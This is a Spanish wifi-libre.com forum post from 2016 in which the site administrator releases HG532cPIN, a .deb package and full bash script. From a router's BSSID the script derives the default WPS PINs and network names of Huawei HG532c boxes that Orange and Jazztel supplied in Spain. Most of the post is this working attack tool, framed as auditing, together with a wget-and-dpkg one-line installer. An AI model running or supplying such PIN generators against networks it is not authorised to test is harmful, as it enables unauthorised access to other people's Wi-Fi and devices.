HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX (Pagina 1) / Las herramientas para attaque WPS / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 29-11-2016 00:56:43

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,297

HG532cPIN: Generador Pin Huawei HG532c Jazztel_XX y FTE-XXXX

HG532cPIN: Generador Pin por defecto de los Huawei HG532c con eSSID por defecto Jazztel_XX y FTE-XXXX

HG532cPIN_3.jpg

¡Buenas tardes noches!
Subo para descargas y formato *.deb el script HG532cPIN
Para los detalles sobre al algoritmo codificado y los dispositivos afectados les invito a leer el full disclosure: Algoritmo PIN de los HG532c de Huawei (redes FTE-XXXX y jazztel_XX)
Para los que siempre tienen prisas...
En resumen: 
  Si tu tiempo está tan preciado a lo mejor lo estas perdiendo leyendo esto.
El algoritmo no es nada nuevo, lo publiqué en 2012 con la primera versión de WPSPIN.
  Ya esta incluido en todos los scripts que usas para auditorias WPS en España.
  Además este modelo esta en vía de extinción, Orange y Jazztel han parrado de distribuirlos desde años (¿5?) y han pasado a las livebox (arcadyan-orange) y a los ZTE (jazztel.) 
 
¿Por qué sacar cinco años después un código con un algoritmo viejo?
Hace poco v1sit0r se ha interesado a los algoritmos WPS conocidos para ampliar su programa (airgeddon)
Me he dado cuenta que el algoritmo era muy difícil de encontrar y entender (al pesar de ser simple) en WPSPIN ya que se fundía en dos funciones.
Me he dado cuenta también de que podía mejorarlo, dejarlo más limpio (gracias shellcheck y v1sit0r por haberme hablado de el)  y más simple.
  También me he dado cuenta que me había olvidado de generar el eSSID por defecto cuando este había sido modificado.
  No importa a la hora de auditar una red, pero si se sabe hacer... ¿Por qué no incluirlo? 

Instalación y uso

 

paquete *.deb para kali linux

Podemos instalar en una linea así:

wget https://www.wifi-libre.com/img/members/3/HG532cPIN_1_0-0.deb && sudo  dpkg -i HG532cPIN_1_0-0.deb

Sino lo descargas: HG532cPIN_1_0-0.deb
Abres una consola en tu directorio Descargas y lanzas la instalación

sudo dpkg -i HG532cPIN_1_0-0.deb

Una vez instalado el icono para lanzar el script aparece en tu menú wireless. (Aplicaciones>Ataques wireless>Herramientas wireless

HG532cPIN_1.jpg

Hacemos clic y, magia, el script se lanza... HG532cPIN_2.jpg
Des-instalar HG532cPIN es tan fácil como teclear

sudo dpkg -r HG532cPIN

fuente bash para todos sistemas

Para los que no usan kali Linux o prefieren lanzar el script sin tenerlo instalado, aquí tenéis el código fuente bash.

#!/bin/bash
# Script: HG532c.sh
# Copyleft : GPL v.3
# Author: kcdtv @ wifi-libe
# Description: HG532c.sh will generate the default WPS PIN and SSID of Huawei HG532c, a popular box used by several ISP in Spain (orange and jazztel) 
# Visit www.wifi-libre.com for more details.  


#### Function

WPSCHECKSUM(){                                                                # Generate the 8th and last digit of the WPS PIN (checksum)  
ACCUM=$(($(echo "$STRING" | cut -c 1) * 3 + $(echo "$STRING" | cut -c 2) + $(echo "$STRING" | cut -c 3) * 3 + $(echo "$STRING" | cut -c 4) + $(echo "$STRING" | cut -c 5) * 3 + $(echo "$STRING" | cut -c 6) + $(echo "$STRING" | cut -c 7) * 3)) # Summing and multiplication with the digits following WPS checksum rule
CHECKSUM=$((((10 - $((ACCUM%10))))%10))                                       # Generating the checksum
}

###Script

echo -e "
               \e[41m _   _  ____ ____ _________      \e[100m  ____ ___ _   _ \e[0m
               \e[41m| | | |/ ___| ___|___ /___ \ ___ \e[100m |  _ \_ _| \ | |\e[0m
               \e[41m| |_| | |  _|___ \ |_ \ __) / __|\e[100m | |_) | ||  \| |\e[0m
               \e[41m|  _  | |_| |___) |__) / __/ (__ \e[100m |  __/| || |\  |\e[0m
               \e[41m|_| |_|\____|____/____/_____\___|\e[100m |_|  |___|_| \_|\e[0m
               \e[41m                                 \e[100m                 \e[0m

               coded by \e[45mkcdtv\e[0m for \e[104mwww.wifi-libre.com\e[0m copyleft GPL

           Script to generate the default PIN and eSSID of Huawei HG532c, 
                  a device used by the ISP orange and jazztel

--------------------------------------------------------------------------------

"
read -r -ep  "Insert bSSID and press [Enter]: " BSSID  
while ! (echo "$BSSID" | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$") # Loop to check the conformity of the the entered bSSID 
  do             
    echo -e " \e[1m\e[31mSyntax error\e[0m : Nonconforming mac address"   # test error
    echo -e "                                  
\e[36mPlease enter a valid bSSID (12 hexadecimal digits)
example: 34:6B:D3:01:23:45
\e[0m"
    read -r -ep   "Insert bSSID and press [Enter]: " BSSID  
done                                                                                  
CONVERTEDBSSID=$(printf '%d\n' 0x"$(echo "$BSSID" | cut -c 10,11,13,14,16,17)")   # Convert from hexadecimal to decimal the 6 lasts digits of bSSID


###### Generating first PIN (PIN1) with it default SSID (SSID1) 
STRING=$(printf '%07d\n' $((CONVERTEDBSSID%10000000)))                       # To ensure that we have strictly a 7 digits string 
WPSCHECKSUM                                                                   # To generate the WPS checksum
PIN1=$STRING$CHECKSUM                                                         
SSID1=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) - 0x7)))       # The default SSID that goes with this PIN
SSID1=$( echo "0000$SSID1" | egrep -o '.{1,4}$')                              # Dirty but easy walk-around to get a 4 digits string for the essid 

##### Generating second PIN (PIN2) with it default SSID (SSID2)
STRING=$(printf '%07d\n' $(($((CONVERTEDBSSID%10000000))+8)))                         # To generate the second PIN we have to add 8 to our converted bSSID
WPSCHECKSUM
PIN2=$STRING$CHECKSUM
SSID2=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) + 0x1)))       # To generate the default ssid we have to add 1 (-7 for PIN1) 
SSID2=$( echo "0000$SSID2" | egrep -o '.{1,4}$') 

##### Generating third PIN (PIN3) with it default SSID (SSID3)
STRING=$(printf '%07d\n' $(($((CONVERTEDBSSID%10000000))+14)))
WPSCHECKSUM
PIN3=$STRING$CHECKSUM
SSID3=$(printf "%X\n" $((0x$(echo "$BSSID" | cut -c 13-14,16-17) + 0x7)))       # for the third ssid: end bssid + 7
SSID3=$( echo "0000$SSID3" | egrep -o '.{1,4}$')

##### Display the results with a check on bssid
case $(echo "$BSSID" | cut -c 1-2,4-5,7-8) in
04C06F | 202BC1 | 285FDB | 346BD3 | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0 | F83DFF)   # FTE bssid
echo -e "

 WPS PIN is \e[1m\e[31m$PIN1\e[0m for essid \e[35mFTE-$SSID1\e[0m
 WPS PIN is \e[1m\e[31m$PIN2\e[0m for essid \e[35mFTE-$SSID2\e[0m
 WPS PIN is \e[1m\e[31m$PIN3\e[0m for essid \e[35mFTE-$SSID3\e[0m 

"
;;
C8D15E)
echo -e "

 WPS PIN is \e[1m\e[31m$PIN1\e[0m for essid \e[35mJazztel_$(echo "$SSID1" | cut -c 3-4)\e[0m
 WPS PIN is \e[1m\e[31m$PIN2\e[0m for essid \e[35mJazztel_$(echo "$SSID2" | cut -c 3-4)\e[0m
 WPS PIN is \e[1m\e[31m$PIN3\e[0m for essid \e[35mJazztel_$(echo "$SSID3" | cut -c 3-4)\e[0m 

"
;;
*)
echo -e "

 This bSSID is not one used by HG532c
 The PIN are displayed but will surely not work...

PIN1 is $PIN1
PIN2 is $PIN2 
PIN3 is $PIN3

"
esac
echo -e  "
                     Bye! See in you in \e[33mwww.wifi-libre.com\e[0m!
"
exit 0 

  Copiar, pegar en un editor de texto, guardar como HG523cPIN.sh o lo que queréis, abrir una consola en el directorio que contiene el script y lanzarlo con

bash HG532cPIN.sh

  ¡Hasta luego! wink

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
18 235 Ayer 22:20:32 por muglio
modificar linset por dynyly  [ 1 2 3 ]
60 13547 Ayer 15:17:56 por dynyly
Pegado:
71 3407 18-02-2017 00:36:02 por kcdtv
4 26 15-02-2017 23:48:49 por kcdtv
0 43 15-02-2017 20:56:34 por Betis-Jesus

Pie de página

Información del usuario

Ultimo usuario registrado: Crawler
Usuarios registrados conectados: 0
Invitados conectados: 5

Estadisticas de los foros

Número total de usuarios registrados: 412
Número total de temas: 689
Número total de mensajes: 4,843

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20